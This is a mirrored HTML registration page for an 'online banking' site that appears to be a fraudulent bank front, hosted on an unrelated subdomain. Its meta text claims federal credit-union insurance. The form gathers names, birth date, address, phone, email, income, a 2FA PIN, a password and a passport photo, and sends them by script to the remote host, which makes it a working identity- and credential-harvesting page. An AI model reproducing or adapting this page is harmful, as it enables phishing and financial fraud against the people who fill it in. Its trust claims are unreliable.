<script>window.location.href='../index.html';</script> 


<!DOCTYPE html>
<html lang="en-US" class="js">

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/secure/register?tc=1 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:18 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>  
    <meta charset="utf-8">
    <meta name="author" content="Softnio">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="cressetunionalliance.live is federally insured by the National Credit Union Administration. We do business in accordance with the Fair Housing Law and Equal opportunity Credit Act.">
    <link rel="shortcut icon" href="../images/favicon.png" type="image/x-icon">
    <!-- Fav Icon  -->
    <link rel="shortcut icon" href="../images/favicon.png">
    <!-- Page Title  -->
    <title>Register |  Welcome to cressetunionalliance.live Online Banking</title>
    <!-- StyleSheets  -->
    <link rel="stylesheet" href="../assets/css/dashlite8d5a.css?ver=2.4.0">
    <link rel="stylesheet" href="../scss/sweetalert.css">
    <link id="skin-default" rel="stylesheet" href="../assets/css/theme8d5a.css?ver=2.4.0">
    <link id="skin-default" rel="stylesheet" href="../assets/css/theme8d5a.css?ver=2.4.0">
     <link href="../css/toastr.css" rel="stylesheet"/>
</head>
<style type="text/css">
    .btn-primary{
        background-color: #3140fc;
    }
    .btn-secondary{
        background-color: #d13636;
    }
    .btn-secondary:hover{opacity: 0.6;}
    .btn-primary:hover{opacity: 0.6;}
</style>

<body class="nk-body npc-crypto bg-white pg-auth">
<div class="nk-content card-header">
 <div class="container-xl wide-lg">
        <div class="nk-content-body">
         <div class="nk-feature-conten p-3">
           <a href="https://codedexpertz.top/cressetunionalliance.live"> <img src="../logo.png" width="230" class="p-3"></a>
          </div>
     </div>
<div class="card card-bordered s-4 col-lg-12 p-0">
 <div class="card-header font-weight-bold text-light" style="background-color:#3140fc;">
    <h5 class="text-white"><em class="icon ni ni-user-add-fill"></em> Kindly provide the information requested below to enable us create an account for you.</h5>
</div>  
<form action="https://cressetunionalliance.live.geraldwhitesaving.com/myaccount/scripts/auth?action=registerUserAccount" method="post" enctype="multipart/form-data" id="registerForm">
<div class="card-body">
    <b>Personal Details</b>
    <hr>
<div class="row">
  <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">First Name</label>
     <input type="text" class="form-control" id="firstname" name="firstname" placeholder="First Name" required>
    </div>
   </div>
   <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Middle name</label>
     <input type="text" class="form-control" id="middlename" name="middlename" placeholder="Middle Name" required>
    </div>
   </div>
    <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Last Name</label>
     <input type="text" class="form-control" id="lastname" name="lastname" placeholder="Last Name" required>
    </div>
   </div>
   <label class="form-label col-lg-12">Address</label>
   <div class="col-lg-4">
                                <div class="form-group"><label
                                        class="form-label"
                                        for="countryId">Country</label>
                                    <div class="form-control-wrap">
                                        <select class="form-control" id="countryId"
                                            name="country" onchange="formUp('countryId')"
                                            required="" data-msg="Select Country">
                                            <option value="">Select Country</option>
                                        </select>
                                        </div>
                                </div>
                            </div>
   <div class="col-lg-4">
                                <div class="form-group"><label
                                        class="form-label"
                                        for="stateId">State</label>
                                        <script src="../../../codedexpertz.top/cressetunionalliance.live/myaccount/personal-banking/countries.js"></script>
                                    <div class="form-control-wrap">
                                        <select class="form-control" id="stateId"
                                            name="state" onchange="formUp('stateId')"
                                            required="" data-msg="Select State">
                                            <option value="">Select State</option>
                                        </select>
                                        </div>
                                </div>
                            </div>
                            <div class="col-lg-4">
                                <div class="form-group"><label
                                        class="form-label"
                                        for="cityId">City</label>
                                    <div class="form-control-wrap">
                                        <input class="cities form-control"  id="cityId"
                                            name="city"
                                            required="" data-msg="Enter City">
                                            <script language="javascript">
                                        populateCountries("countryId", "stateId");
                                        populateCountries("country1");
                                        populateCountries("country1");
                                    </script>
                                        </div>
                                </div>
                            </div>    <div class="col-md-2">
   <div class="form-group">
    <label class="form-label" for="phone-no">Zip code</label>
     <input type="text" class="form-control" id="zipcode" name="zipcode" placeholder="zipcode/postal code" required>
    </div>
   </div>
   <div class="col-md-2">
   <div class="form-group">
    <label class="form-label" for="phone-no">Date of Birth</label>
     <input type="text" class="form-control date-picker" id="dob" name="dob" placeholder="Date of Birth" required>
    </div>
   </div>
    <div class="col-md-8">
   <div class="form-group">
    <label class="form-label" for="phone-no">House Address</label>
     <input type="text" class="form-control" id="address" name="address" placeholder="House address" required>
    </div>
   </div>
 <div class="col-md-6">
   <div class="form-group">
    <label class="form-label" for="phone-no">Phone Number</label>
     <input type="text" class="form-control" id="phone" name="phone" placeholder="Phone Number" required>
    </div>
   </div>
    <div class="col-md-6">
   <div class="form-group">
    <label class="form-label" for="phone-no">Email address</label>
     <input type="email" class="form-control" id="email" name="email" placeholder="Enter Email address" required>
    </div>
   </div>
</div>  
<hr>
<b>Employment information</b>
<div class="row">
 <div class="col-md-6">
   <div class="form-group">
    <label class="form-label" for="phone-no">Occupation</label>
       <select type="text" class="form-control" id="occupation" name="occupation" value="" required>
           <option value="">Select Type of Employment</option>
                    <option value="Self Employed">Self Employed</option>  
                    <option value="Self Employed">Public/Government Office</option>  
                    <option value="Self Employed">Private/Partnership Office</option>  
                    <option value="Self Employed">Business/Sales</option>  
                    <option value="Self Employed">Trading/Market</option>  
                    <option value="Self Employed">Military/Paramilitary</option>  
                    <option value="Self Employed">Politician/Celebrity</option>  
          </select>
    </div>
   </div>
   <div class="col-md-6">
   <div class="form-group">
    <label class="form-label" for="phone-no">Annual Income range</label>
       <select type="text" class="form-control" id="income" name="income" value="" required>
           <option value="">Select Salary Range</option>
                    <option value="$100.00 - $500.00">$100.00 - $500.00</option> 
                    <option value="$700.00 - $1,000.00">$700.00 - $1,000.00</option> 
                    <option value="$1,000.00 - $2,000.00">$1,000.00 - $2,000.00</option> 
                    <option value="$2,000.00 - $5,000.00">$2,000.00 - $5,000.00</option> 
                    <option value="$5,000.00 - $10,000.00">$5,000.00 - $10,000.00</option> 
                    <option value="$15,000.00 - $20,000.00">$15,000.00 - $20,000.00</option> 
                    <option value="$25,000.00 - $30,000.00">$25,000.00 - $30,000.00</option> 
                    <option value="$30,000.00 - $70,000.00">$30,000.00 - $70,000.00</option> 
                    <option value="$80,000.00 - $140,000.00">$80,000.00 - $140,000.00</option> 
                    <option value="$150,000.00 - $300,000.00">$150,000.00 - $300,000.00</option> 
                    <option value="$300,000.00 - $1,000,000.00">$300,000.00 - $1,000,000.00</option> 
          </select>
    </div>
   </div>
</div>
<hr>
<b>Banking  Details</b>
    <hr>
    <div class="row">
  <!--<div class="col-md-4">-->
  <!-- <div class="form-group">-->
  <!--  <label class="form-label" for="phone-no">SSN/TIN(Or equivalence)</label>-->
     <input type="hidden" class="form-control" id="ssn" name="ssn" value="ssn">
   <!-- </div>-->
   <!--</div>-->
   <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Account Type</label>
       <select type="text" class="form-control" id="accounttype" name="accounttype" value="" required>
          <option value="">Please select Account Type</option> 
            <option value="Checking Account">Checking Account</option>
            <option value="Savings Account">Saving Account</option>
            <option value="Fixed Deposit Account">Fixed Deposit Account</option>
            <option value="Current Account">Current Account</option>
            <option value="Crypto Currency Account">Crypto Currency Account</option>
            <option value="Business Account">Business Account</option>
            <option value="Non Resident Account">Non Resident Account</option>
            <option value="Cooperate Business Account">Cooperate Business Account</option>
            <option value="Investment Account">Investment Account</option>
          </select>
     </div>
   </div>
    <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Account Currency</label>
     <select type="text" class="form-control" id="usercurrency" name="usercurrency">
        <option value="USD">America (United States) Dollars – USD</option>
<option value="AFN">Afghanistan Afghanis – AFN</option>
<option value="ALL">Albania Leke – ALL</option>
<option value="DZD">Algeria Dinars – DZD</option>
<option value="ARS">Argentina Pesos – ARS</option>
<option value="AUD">Australia Dollars – AUD</option>
<option value="ATS">Austria Schillings – ATS</option>
 
<option value="BSD">Bahamas Dollars – BSD</option>
<option value="BHD">Bahrain Dinars – BHD</option>
<option value="BDT">Bangladesh Taka – BDT</option>
<option value="BBD">Barbados Dollars – BBD</option>
<option value="BEF">Belgium Francs – BEF</option>
<option value="BMD">Bermuda Dollars – BMD</option>
 
<option value="BRL">Brazil Reais – BRL</option>
<option value="BGN">Bulgaria Leva – BGN</option>
<option value="CAD">Canada Dollars – CAD</option>
<option value="XOF">CFA BCEAO Francs – XOF</option>
<option value="XAF">CFA BEAC Francs – XAF</option>
<option value="CLP">Chile Pesos – CLP</option>
 
<option value="CNY">China Yuan Renminbi – CNY</option>
<option value="CNY">RMB (China Yuan Renminbi) – CNY</option>
<option value="COP">Colombia Pesos – COP</option>
<option value="XPF">CFP Francs – XPF</option>
<option value="CRC">Costa Rica Colones – CRC</option>
<option value="HRK">Croatia Kuna – HRK</option>
 
<option value="CYP">Cyprus Pounds – CYP</option>
<option value="CZK">Czech Republic Koruny – CZK</option>
<option value="DKK">Denmark Kroner – DKK</option>
<option value="DEM">Deutsche (Germany) Marks – DEM</option>
<option value="DOP">Dominican Republic Pesos – DOP</option>
<option value="NLG">Dutch (Netherlands) Guilders – NLG</option>
 
<option value="XCD">Eastern Caribbean Dollars – XCD</option>
<option value="EGP">Egypt Pounds – EGP</option>
<option value="EEK">Estonia Krooni – EEK</option>
<option value="EUR">Euro – EUR</option>
<option value="FJD">Fiji Dollars – FJD</option>
<option value="FIM">Finland Markkaa – FIM</option>
 
<option value="FRF*">France Francs – FRF*</option>
<option value="DEM">Germany Deutsche Marks – DEM</option>
<option value="XAU">Gold Ounces – XAU</option>
<option value="GRD">Greece Drachmae – GRD</option>
<option value="GTQ">Guatemalan Quetzal – GTQ</option>
<option value="NLG">Holland (Netherlands) Guilders – NLG</option>
<option value="HKD">Hong Kong Dollars – HKD</option>
 
<option value="HUF">Hungary Forint – HUF</option>
<option value="ISK">Iceland Kronur – ISK</option>
<option value="XDR">IMF Special Drawing Right – XDR</option>
<option value="INR">India Rupees – INR</option>
<option value="IDR">Indonesia Rupiahs – IDR</option>
<option value="IRR">Iran Rials – IRR</option>
 
<option value="IQD">Iraq Dinars – IQD</option>
<option value="IEP*">Ireland Pounds – IEP*</option>
<option value="ILS">Israel New Shekels – ILS</option>
<option value="ITL*">Italy Lire – ITL*</option>
<option value="JMD">Jamaica Dollars – JMD</option>
<option value="JPY">Japan Yen – JPY</option>
 
<option value="JOD">Jordan Dinars – JOD</option>
<option value="KES">Kenya Shillings – KES</option>
<option value="KRW">Korea (South) Won – KRW</option>
<option value="KWD">Kuwait Dinars – KWD</option>
<option value="LBP">Lebanon Pounds – LBP</option>
<option value="LUF">Luxembourg Francs – LUF</option>
 
<option value="MYR">Malaysia Ringgits – MYR</option>
<option value="MTL">Malta Liri – MTL</option>
<option value="MUR">Mauritius Rupees – MUR</option>
<option value="MXN">Mexico Pesos – MXN</option>
<option value="MAD">Morocco Dirhams – MAD</option>
<option value="NLG">Netherlands Guilders – NLG</option>
 
<option value="NZD">New Zealand Dollars – NZD</option>
<option value="NGN">Nigeria Naira – NGN</option>
<option value="NOK">Norway Kroner – NOK</option>
<option value="OMR">Oman Rials – OMR</option>
<option value="PKR">Pakistan Rupees – PKR</option>
<option value="XPD">Palladium Ounces – XPD</option>
<option value="PEN">Peru Nuevos Soles – PEN</option>
 
<option value="PHP">Philippines Pesos – PHP</option>
<option value="XPT">Platinum Ounces – XPT</option>
<option value="PLN">Poland Zlotych – PLN</option>
<option value="PTE">Portugal Escudos – PTE</option>
<option value="QAR">Qatar Riyals – QAR</option>
<option value="RON">Romania New Lei – RON</option>
 
<option value="ROL">Romania Lei – ROL</option>
<option value="RUB">Russia Rubles – RUB</option>
<option value="SAR">Saudi Arabia Riyals – SAR</option>
<option value="XAG">Silver Ounces – XAG</option>
<option value="SGD">Singapore Dollars – SGD</option>
<option value="SKK">Slovakia Koruny – SKK</option>
 
<option value="SIT">Slovenia Tolars – SIT</option>
<option value="ZAR">South Africa Rand – ZAR</option>
<option value="KRW">South Korea Won – KRW</option>
<option value="ESP">Spain Pesetas – ESP</option> 
 
<option value="SDD">Sudan Dinars – SDD</option>
<option value="SEK">Sweden Kronor – SEK</option>
<option value="CHF">Switzerland Francs – CHF</option>
<option value="TWD">Taiwan New Dollars – TWD</option>
<option value="THB">Thailand Baht – THB</option>
<option value="TTD">Trinidad and Tobago Dollars – TTD</option>
 
<option value="TND">Tunisia Dinars – TND</option>
<option value="TRY">Turkey New Lira – TRY</option>
<option value="AED">United Arab Emirates Dirhams – AED</option>
<option value="GBP">United Kingdom Pounds – GBP</option>
<option value="USD">United States Dollars – USD</option>
<option value="VEB">Venezuela Bolivares – VEB</option>
 
<option value="VND">Vietnam Dong – VND</option>
<option value="ZMK">Zambia Kwacha – ZMK</option>     </select>
    </div>
   </div>
    <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">2FA PIN</label>
     <input type="password" class="form-control" id="secretCode" maxlength="4" minlength="4" name="secretCode" required>
    </div>
   </div>
     <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Password</label>
     <input type="password" class="form-control" id="password" name="password"  required>
    </div>
   </div>
     <div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Confirm Password</label>
     <input type="password" class="form-control" id="cpassword" name="cpassword" placeholder="Confirm password" required>
    </div>
   </div>
<div class="col-md-4">
   <div class="form-group">
    <label class="form-label" for="phone-no">Passport Photograph</label>
     <img src="passport/sample.png" style="width:100%; height:180px;" id="output_image">
     <input type="file" class="form-control" id="passport" name="passport" accept="image/*" onchange="preview_image(event)" required>
    </div>
   </div>
</div>
<div id="registerResult"></div>
</div>
<div class="card-footer">
    <button type="submit" class="btn btn-primary" id="btn">Submit</button>
    <button type="reset" class="btn btn-danger ">Reset</button>
    <button type="button" onclick="window.history.go(-1);" class="btn btn-default "><em class="icon ni ni-arrow-left"></em> back</button>
</div>  
</form> 
</div>
<!-- JavaScript -->
  <script src="../js/jquery.min.js"></script>
    <script type="text/javascript">
    $(document).ready(function (e) {
    $("#registerForm").on('submit',(function(e) {
        document.getElementById("btn").disabled = true;
        e.preventDefault();
        $.ajax({
            url: "../scripts/auth?action=registerUserAccount",
            type: "POST",
            data:  new FormData(this),
            contentType: false,
            cache: false,
            processData:false,
            success: function(data)
            {
            $("#registerResult").html(data);
            document.getElementById("btn").disabled = false;
            },
            error: function()
            {
            }           
       });
    }));
});

    //IMAGE PREVIEW
 function preview_image(event) 
{
 var reader = new FileReader();
 reader.onload = function()
 {
  var output = document.getElementById('output_image');
  output.src = reader.result;
 }
 reader.readAsDataURL(event.target.files[0]);
}   

  </script>
    <script src="../assets/js/bundle8d5a.js?ver=2.4.0"></script>
    <script src="../assets/js/scripts8d5a.js?ver=2.4.0"></script>
   <script src="../js/vendors/sweetalert.js"></script>
    <script src="../assets/js/custom.js"></script>
   <script src="../js/toastr.js"></script>
</body>

<!-- Mirrored from cressetunionalliance.live.geraldwhitesaving.com/myaccount/secure/register?tc=1 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 28 Jul 2023 14:30:19 GMT -->
</html>
